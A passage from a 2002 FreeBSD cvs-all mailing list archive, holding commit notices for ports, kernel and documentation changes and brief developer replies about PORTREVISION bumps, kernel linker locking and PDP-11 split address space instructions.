2002 01:41:39 -0700 (PDT) Message-ID: <3D119542.994D9CCF@FreeBSD.org> Date: Thu, 20 Jun 2002 01:41:38 -0700 From: Doug Barton Organization: Triborough Bridge & Tunnel Authority X-Mailer: Mozilla 4.79 [en] (X11; U; FreeBSD 4.6-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Alan Eldridge Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: ports/net/samba Makefile pkg-plist References: <200206200218.g5K2IDZ58071@freefall.freebsd.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Alan Eldridge wrote: > > alane 2002/06/19 19:18:13 PDT > > Modified files: > net/samba Makefile pkg-plist > Log: > Fix pkg-plist after version bump. > Bump PORTREVISION to 1. You haven't changed the functionality of the port, why bump portrevision? > Submitted by: alane@freebsd.org We assume that you are comitting your own work, unless otherwise noted. Also, people in the project are just referred to by their usernames... no need for the @freebsd.org. Doug To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 1:48:45 2002 Delivered-To: cvs-all@freebsd.org Received: from axl.seasidesoftware.co.za (axl.seasidesoftware.co.za [196.31.7.201]) by hub.freebsd.org (Postfix) with ESMTP id 623EE37B401; Thu, 20 Jun 2002 01:48:39 -0700 (PDT) Received: from sheldonh by axl.seasidesoftware.co.za with local (Exim 3.36 #1) id 17KxdA-000AMb-00; Thu, 20 Jun 2002 10:49:28 +0200 Date: Thu, 20 Jun 2002 10:49:28 +0200 From: Sheldon Hearn To: Doug Barton Cc: Alan Eldridge , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: ports/net/samba Makefile pkg-plist Message-ID: <20020620084928.GB38331@starjuice.net> Mail-Followup-To: Doug Barton , Alan Eldridge , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org References: <200206200218.g5K2IDZ58071@freefall.freebsd.org> <3D119542.994D9CCF@FreeBSD.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3D119542.994D9CCF@FreeBSD.org> User-Agent: Mutt/1.5.1i Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On (2002/06/20 01:41), Doug Barton wrote: > > Log: > > Fix pkg-plist after version bump. > > Bump PORTREVISION to 1. > > You haven't changed the functionality of the port, why bump > portrevision? If you fix the PLIST, the resulting package will install a different set of files. I thought this warranted a PORTREVISION bump. Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 1:49:49 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 16A2937B404; Thu, 20 Jun 2002 01:49:45 -0700 (PDT) Received: (from dougb@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K8ni431052; Thu, 20 Jun 2002 01:49:44 -0700 (PDT) (envelope-from dougb) Message-Id: <200206200849.g5K8ni431052@freefall.freebsd.org> From: Doug Barton Date: Thu, 20 Jun 2002 01:49:44 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/etc/rc.d amd mountd rpcbind syscons X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG dougb 2002/06/20 01:49:44 PDT Modified files: etc/rc.d amd mountd rpcbind syscons Log: Anonymize the "portmap" program to get better compatibility with rpcbind in -current. Submitted by: Alexander Kabaev Revision Changes Path 1.3 +4 -2 src/etc/rc.d/amd 1.3 +4 -1 src/etc/rc.d/mountd 1.3 +0 -1 src/etc/rc.d/rpcbind 1.2 +2 -0 src/etc/rc.d/syscons To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 1:54:13 2002 Delivered-To: cvs-all@freebsd.org Received: from mail-relay1.yahoo.com (mail-relay1.yahoo.com [216.145.48.34]) by hub.freebsd.org (Postfix) with ESMTP id 95D1B37B40F; Thu, 20 Jun 2002 01:54:06 -0700 (PDT) Received: from FreeBSD.org (12-234-90-219.client.attbi.com [12.234.90.219]) by mail-relay1.yahoo.com (Postfix) with ESMTP id 3F40B8B5E6; Thu, 20 Jun 2002 01:54:06 -0700 (PDT) Message-ID: <3D11982E.D27B5EDB@FreeBSD.org> Date: Thu, 20 Jun 2002 01:54:06 -0700 From: Doug Barton Organization: Triborough Bridge & Tunnel Authority X-Mailer: Mozilla 4.79 [en] (X11; U; FreeBSD 4.6-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Nick Hibma Cc: "cvs-committers@FreeBSD.org" , "cvs-all@FreeBSD.org" Subject: Re: cvs commit: src/etc usbd.conf References: <20020619212311.J228-100000@heather.van-laarhoven.org> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Nick Hibma wrote: > > Um, the following works just fine. In /etc/rc.conf add something along > the lines of: > > allscreens_flags="-m on" > > No need for vidcontrol -m on to be called after the mouse has been > attached to. Cool... I'll test that, thanks. > P.S.: I noticed the message in current but too late. No worries... I'd rather have your attention focussed on fixing printing in -current. :) Doug To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 1:55:44 2002 Delivered-To: cvs-all@freebsd.org Received: from beppo.feral.com (beppo.feral.com [192.67.166.79]) by hub.freebsd.org (Postfix) with ESMTP id 855E237B407; Thu, 20 Jun 2002 01:55:39 -0700 (PDT) Received: from mailhost.feral.com (mjacob@mailhost.feral.com [192.67.166.1]) by beppo.feral.com (8.11.3/8.11.3) with ESMTP id g5K8tcO27990; Thu, 20 Jun 2002 01:55:38 -0700 (PDT) (envelope-from mjacob@feral.com) Date: Thu, 20 Jun 2002 01:55:37 -0700 (PDT) From: Matthew Jacob X-Sender: mjacob@beppo Reply-To: mjacob@feral.com To: Peter Wemm Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/sys/alpha/alpha support.s src/sys/i386/i386 support.s src/sys/ia64/ia64 support.s src/sys/powerpc/powerpc copyinout.c src/sys/sys systm.h src/sys/sparc64/sparc64 support.s In-Reply-To: <200206200713.g5K7DaD15856@freefall.freebsd.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG > Log: > Deorbit suibyte(). It was only used for split address space systems Bonus points for naming that system and the instructions used to implement {su,fu}i{word,byte} To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 2: 3:17 2002 Delivered-To: cvs-all@freebsd.org Received: from anchor-post-31.mail.demon.net (anchor-post-31.mail.demon.net [194.217.242.89]) by hub.freebsd.org (Postfix) with ESMTP id 66BB837B409; Thu, 20 Jun 2002 02:03:11 -0700 (PDT) Received: from mailgate.nlsystems.com ([62.49.251.130] helo=herring.nlsystems.com) by anchor-post-31.mail.demon.net with esmtp (Exim 3.35 #1) id 17KxqA-0000qR-0V; Thu, 20 Jun 2002 10:02:54 +0100 Received: from herring.nlsystems.com (localhost [127.0.0.1]) by herring.nlsystems.com (8.12.3/8.11.2) with ESMTP id g5K90DMc004974; Thu, 20 Jun 2002 10:00:13 +0100 (BST) (envelope-from dfr@herring.nlsystems.com) Received: (from dfr@localhost) by herring.nlsystems.com (8.12.3/8.12.3/Submit) id g5K90DmS004973; Thu, 20 Jun 2002 10:00:13 +0100 (BST) Content-Type: text/plain; charset="iso-8859-1" From: Doug Rabson To: "Andrew R. Reiter" , cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/sys/kern kern_linker.c Date: Thu, 20 Jun 2002 10:00:13 +0100 User-Agent: KMail/1.4.1 References: <200206192125.g5JLPxu04373@freefall.freebsd.org> In-Reply-To: <200206192125.g5JLPxu04373@freefall.freebsd.org> MIME-Version: 1.0 Content-Transfer-Encoding: quoted-printable Message-Id: <200206201000.13151.dfr@nlsystems.com> Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Wednesday 19 June 2002 10:25 pm, Andrew R. Reiter wrote: > arr 2002/06/19 14:25:59 PDT > > Modified files: > sys/kern kern_linker.c > Log: > - Remove the lock(9) protecting the kernel linker system. > - Added a mutex, kld_mtx, to protect the kernel_linker system. Note = that > while ``classes'' is global (to that file), it is only read only af= ter > SI_SUB_KLD, SI_ORDER_ANY. > - Add a SYSINIT to flip a flag that disallows class registration afte= r > SI_SUB_KLD, SI_ORDER_ANY. What about classes that are loaded later? --=20 Doug Rabson=09=09=09=09Mail: dfr@nlsystems.com =09=09=09=09=09Phone: +44 20 8348 6160 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 2: 4:37 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0E30337B407; Thu, 20 Jun 2002 02:04:34 -0700 (PDT) Received: (from bde@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K94YU33193; Thu, 20 Jun 2002 02:04:34 -0700 (PDT) (envelope-from bde) Message-Id: <200206200904.g5K94YU33193@freefall.freebsd.org> From: Bruce Evans Date: Thu, 20 Jun 2002 02:04:33 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/sys _sigset.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG bde 2002/06/20 02:04:33 PDT Modified files: sys/sys _sigset.h Log: Quick fix for the type of the bitmap in sigset_t. It was an array of 4 u_ints but needs to be an array of 4 uint32_t's to work, at least if unsigned ints have less than 32 bits. It should be a non-array of 1 uint128_t on 128-bit machines, especially if u_int has 128 bits. The headers that declare uint32_t (actually __uint32_t) are intentionally not included here since this header should only be included by other headers. Fixed some style bugs (space instead of tab after #ifndef and #endif). Revision Changes Path 1.32 +3 -3 src/sys/sys/_sigset.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 2: 8:20 2002 Delivered-To: cvs-all@freebsd.org Received: from overcee.wemm.org (12-232-114-102.client.attbi.com [12.232.114.102]) by hub.freebsd.org (Postfix) with ESMTP id C502737B400; Thu, 20 Jun 2002 02:08:16 -0700 (PDT) Received: from wemm.org (localhost [127.0.0.1]) by overcee.wemm.org (Postfix) with ESMTP id C4F36380E; Thu, 20 Jun 2002 02:08:18 -0700 (PDT) (envelope-from peter@wemm.org) X-Mailer: exmh version 2.5 07/13/2001 with nmh-1.0.4 To: mjacob@feral.com Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/sys/alpha/alpha support.s src/sys/i386/i386 support.s src/sys/ia64/ia64 support.s src/sys/powerpc/powerpc copyinout.c src/sys/sys systm.h src/sys/sparc64/sparc64 support.s In-Reply-To: Date: Thu, 20 Jun 2002 02:08:18 -0700 From: Peter Wemm Message-Id: <20020620090818.C4F36380E@overcee.wemm.org> Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Matthew Jacob wrote: > > Log: > > Deorbit suibyte(). It was only used for split address space systems > > Bonus points for naming that system and the instructions used to implement > {su,fu}i{word,byte} Other than PDP-something, I'm not going to try. All I remember was that they had 64K addressing split into 64K instruction and 64K data space. Cheers, -Peter -- Peter Wemm - peter@wemm.org; peter@FreeBSD.org; peter@yahoo-inc.com "All of this is for nothing if we don't go to the stars" - JMS/B5 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 2:43:56 2002 Delivered-To: cvs-all@freebsd.org Received: from blues.jpj.net (blues.jpj.net [204.97.17.6]) by hub.freebsd.org (Postfix) with ESMTP id 2D00837B406; Thu, 20 Jun 2002 02:43:53 -0700 (PDT) Received: from localhost (trevor@localhost) by blues.jpj.net (8.11.6/8.11.6) with ESMTP id g5K9hqt02714; Thu, 20 Jun 2002 05:43:52 -0400 (EDT) Date: Thu, 20 Jun 2002 05:43:52 -0400 (EDT) From: Trevor Johnson To: Joe Marcus Clarke Cc: cvs-committers@FreeBSD.org, Subject: Re: cvs commit: ports/audio/snd Makefile ports/cad/geda Makefile ports/cad/gnetlist Makefile ports/cad/gschem Makefile ports/deskutils/gnucash Makefile ports/devel/autogen Makefile In-Reply-To: <200206191637.g5JGbvX41372@freefall.freebsd.org> Message-ID: <20020620052749.R1125-100000@blues.jpj.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG > marcus 2002/06/19 09:37:57 PDT [...] > Log: > Chase guile shared lib number. I've noticed that some ports committers have decided not to follow section 4.2.2.1 of the Porter's Handbook. I ask that they not update shared library dependencies for the ports I maintain. I would welcome a note when my ports are out of date. -- Trevor Johnson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 2:46:20 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9FA8337B401; Thu, 20 Jun 2002 02:46:17 -0700 (PDT) Received: (from blackend@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K9kHS41400; Thu, 20 Jun 2002 02:46:17 -0700 (PDT) (envelope-from blackend) Message-Id: <200206200946.g5K9kHS41400@freefall.freebsd.org> From: Marc Fonvieille Date: Thu, 20 Jun 2002 02:46:17 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: doc/fr_FR.ISO8859-1/share/sgml catalog X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG blackend 2002/06/20 02:46:17 PDT Modified files: fr_FR.ISO8859-1/share/sgml catalog Log: Add entry for french translation of teams.ent (required by some articles). Approved by: keramida Revision Changes Path 1.3 +5 -2 doc/fr_FR.ISO8859-1/share/sgml/catalog To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 2:49:48 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id F117E37B40D; Thu, 20 Jun 2002 02:49:41 -0700 (PDT) Received: (from trevor@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K9nf141605; Thu, 20 Jun 2002 02:49:41 -0700 (PDT) (envelope-from trevor) Message-Id: <200206200949.g5K9nf141605@freefall.freebsd.org> From: Trevor Johnson Date: Thu, 20 Jun 2002 02:49:41 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/x11-fonts/sgifonts Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG trevor 2002/06/20 02:49:41 PDT Modified files: x11-fonts/sgifonts Makefile Log: Inadvertently, I did not remove these lines when I got rid of the use of the temporary file, and so "make do-extract" was broken. reported by: dougb Revision Changes Path 1.6 +0 -4 ports/x11-fonts/sgifonts/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 2:51:52 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8BBC437B40A; Thu, 20 Jun 2002 02:51:25 -0700 (PDT) Received: (from blackend@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5K9pPP42210; Thu, 20 Jun 2002 02:51:25 -0700 (PDT) (envelope-from blackend) Message-Id: <200206200951.g5K9pPP42210@freefall.freebsd.org> From: Marc Fonvieille Date: Thu, 20 Jun 2002 02:51:25 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: doc/fr_FR.ISO8859-1/articles/releng-packages Makefile article.sgml extra.css X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG blackend 2002/06/20 02:51:25 PDT Added files: fr_FR.ISO8859-1/articles/releng-packages Makefile article.sgml extra.css Log: New translation Approved by: keramida Revision Changes Path 1.1 +25 -0 doc/fr_FR.ISO8859-1/articles/releng-packages/Makefile (new) 1.1 +484 -0 doc/fr_FR.ISO8859-1/articles/releng-packages/article.sgml (new) 1.1 +16 -0 doc/fr_FR.ISO8859-1/articles/releng-packages/extra.css (new) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 3: 2: 0 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7132D37B400; Thu, 20 Jun 2002 03:01:56 -0700 (PDT) Received: (from olgeni@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KA1uN43453; Thu, 20 Jun 2002 03:01:56 -0700 (PDT) (envelope-from olgeni) Message-Id: <200206201001.g5KA1uN43453@freefall.freebsd.org> From: Jimmy Olgeni Date: Thu, 20 Jun 2002 03:01:56 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/lang/mit-scheme Makefile distinfo pkg-plist X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG olgeni 2002/06/20 03:01:56 PDT Modified files: lang/mit-scheme Makefile distinfo pkg-plist Log: Update port to version 7.7.1 Prompted by: ijliao Revision Changes Path 1.30 +2 -2 ports/lang/mit-scheme/Makefile 1.12 +1 -1 ports/lang/mit-scheme/distinfo 1.11 +12 -47 ports/lang/mit-scheme/pkg-plist To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 3: 2: 6 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 07F0537B407; Thu, 20 Jun 2002 03:01:56 -0700 (PDT) Received: (from blackend@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KA1tA43424; Thu, 20 Jun 2002 03:01:55 -0700 (PDT) (envelope-from blackend) Message-Id: <200206201001.g5KA1tA43424@freefall.freebsd.org> From: Marc Fonvieille Date: Thu, 20 Jun 2002 03:01:55 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: doc/fr_FR.ISO8859-1/articles Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG blackend 2002/06/20 03:01:55 PDT Modified files: fr_FR.ISO8859-1/articles Makefile Log: Add releng-packages build and sort entries Approved by: keramida Revision Changes Path 1.13 +14 -13 doc/fr_FR.ISO8859-1/articles/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 3:37:48 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 8777B37B40A; Thu, 20 Jun 2002 03:37:44 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KAbiu50948; Thu, 20 Jun 2002 03:37:44 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206201037.g5KAbiu50948@freefall.freebsd.org> From: Juli Mallett Date: Thu, 20 Jun 2002 03:37:44 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src MAINTAINERS X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/20 03:37:44 PDT Modified files: . MAINTAINERS Log: It seems the hard lock on m4(1) is viewed as superfluous. Okay. It's gone. I'm sick of waiting on OpenBSD to make a number of changes anyway. If someone else wants to take over fixing m4(1), I'll be glad to make them aware of the existing issues. Revision Changes Path 1.37 +0 -1 src/MAINTAINERS To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 4: 0:33 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id CA1EF37B40C; Thu, 20 Jun 2002 04:00:23 -0700 (PDT) Received: (from robert@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KB0Nq56724; Thu, 20 Jun 2002 04:00:23 -0700 (PDT) (envelope-from robert) Message-Id: <200206201100.g5KB0Nq56724@freefall.freebsd.org> From: Robert Drehmel Date: Thu, 20 Jun 2002 04:00:23 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/sys/cam/scsi scsi_sa.c X-FreeBSD-CVS-Branch: RELENG_4 Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG robert 2002/06/20 04:00:23 PDT Modified files: (Branch: RELENG_4) sys/cam/scsi scsi_sa.c Log: MFC: Correct spelling of the word 'supplied'. Revision Changes Path 1.45.2.11 +1 -1 src/sys/cam/scsi/scsi_sa.c To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 4: 3:14 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A2B6037B400; Thu, 20 Jun 2002 04:03:08 -0700 (PDT) Received: (from naddy@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KB38C57339; Thu, 20 Jun 2002 04:03:08 -0700 (PDT) (envelope-from naddy) Message-Id: <200206201103.g5KB38C57339@freefall.freebsd.org> From: Christian Weisgerber Date: Thu, 20 Jun 2002 04:03:08 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: ports/www/apache2 Makefile X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG naddy 2002/06/20 04:03:08 PDT Modified files: www/apache2 Makefile Log: * Always use /bin/sh for configure and build. * Fix EXPAT_PATHS substitution on 4.4. Submitted by: maintainer Hye-Shik Chang Revision Changes Path 1.120 +2 -2 ports/www/apache2/Makefile To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 4:14:59 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 771F837B40B; Thu, 20 Jun 2002 04:14:55 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KBEtC62571; Thu, 20 Jun 2002 04:14:55 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206201114.g5KBEtC62571@freefall.freebsd.org> From: Juli Mallett Date: Thu, 20 Jun 2002 04:14:54 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/m4 main.c mdef.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/20 04:14:54 PDT Modified files: usr.bin/m4 main.c mdef.h Log: Cast sp to uintptr_t when doing a compare of it to STACKMAX which is a size_t. This messes up some indentation in mdef.h for some macros. Revision Changes Path 1.19 +2 -2 src/usr.bin/m4/main.c 1.8 +3 -3 src/usr.bin/m4/mdef.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 4:17:51 2002 Delivered-To: cvs-all@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 9329237B409; Thu, 20 Jun 2002 04:17:47 -0700 (PDT) Received: (from jmallett@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5KBHlX62722; Thu, 20 Jun 2002 04:17:47 -0700 (PDT) (envelope-from jmallett) Message-Id: <200206201117.g5KBHlX62722@freefall.freebsd.org> From: Juli Mallett Date: Thu, 20 Jun 2002 04:17:47 -0700 (PDT) To: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: cvs commit: src/usr.bin/m4 mdef.h X-FreeBSD-CVS-Branch: HEAD Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG jmallett 2002/06/20 04:17:47 PDT Modified files: usr.bin/m4 mdef.h Log: Whitespace fixes to line-up EOL escapes whose right-most extraints changed in the previous revision due to the biggest line changing. Revision Changes Path 1.9 +15 -15 src/usr.bin/m4/mdef.h To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe cvs-all" in the body of the message From owner-cvs-all Thu Jun 20 5:10:30 2002 Delivered-To: cvs-all@freebsd.org Received: from beppo.feral.com (beppo.feral.com [192.67.166.79]) by hub.freebsd.org (Postfix) with ESMTP id EDF5A37B412; Thu, 20 Jun 2002 05:10:22 -0700 (PDT) Received: from mailhost.feral.com (mjacob@mailhost.feral.com [192.67.166.1]) by beppo.feral.com (8.11.3/8.11.3) with ESMTP id g5KCAGO29639; Thu, 20 Jun 2002 05:10:20 -0700 (PDT) (envelope-from mjacob@feral.com) Date: Thu, 20 Jun 2002 05:10:16 -0700 (PDT) From: Matthew Jacob X-Sender: mjacob@beppo Reply-To: mjacob@feral.com To: Peter Wemm Cc: cvs-committers@FreeBSD.org, cvs-all@FreeBSD.org Subject: Re: cvs commit: src/sys/alpha/alpha support.s src/sys/i386/i386 support.s src/sys/ia64/ia64 support.s src/sys/powerpc/powerpc copyinout.c src/sys/sys systm.h src/sys/sparc64/sparc64 support.s In-Reply-To: <20020620090818.C4F36380E@overcee.wemm.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-cvs-all@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Thu, 20 Jun 2002, Peter Wemm wrote: > Matthew Jacob wrote: > > > Log: > > > Deorbit suibyte(). It was only used for split address space systems > > > > Bonus points for naming that system and the instructions used to implement > > {su,fu}i{word,byte} > > Other than PDP-something, I'm not going to try. All I remember was that > they had 64K addressing split into 64K instruction and 64K data space. IIRC, mfpd/mtpd (move from/to previous) data space was the requirements for copying to/from user space. The address would be interpreted in the segmentation registers for whatever the *previous* data space was (based on bits in the PS (program status) register. On the 11/70 there were three modes (User, 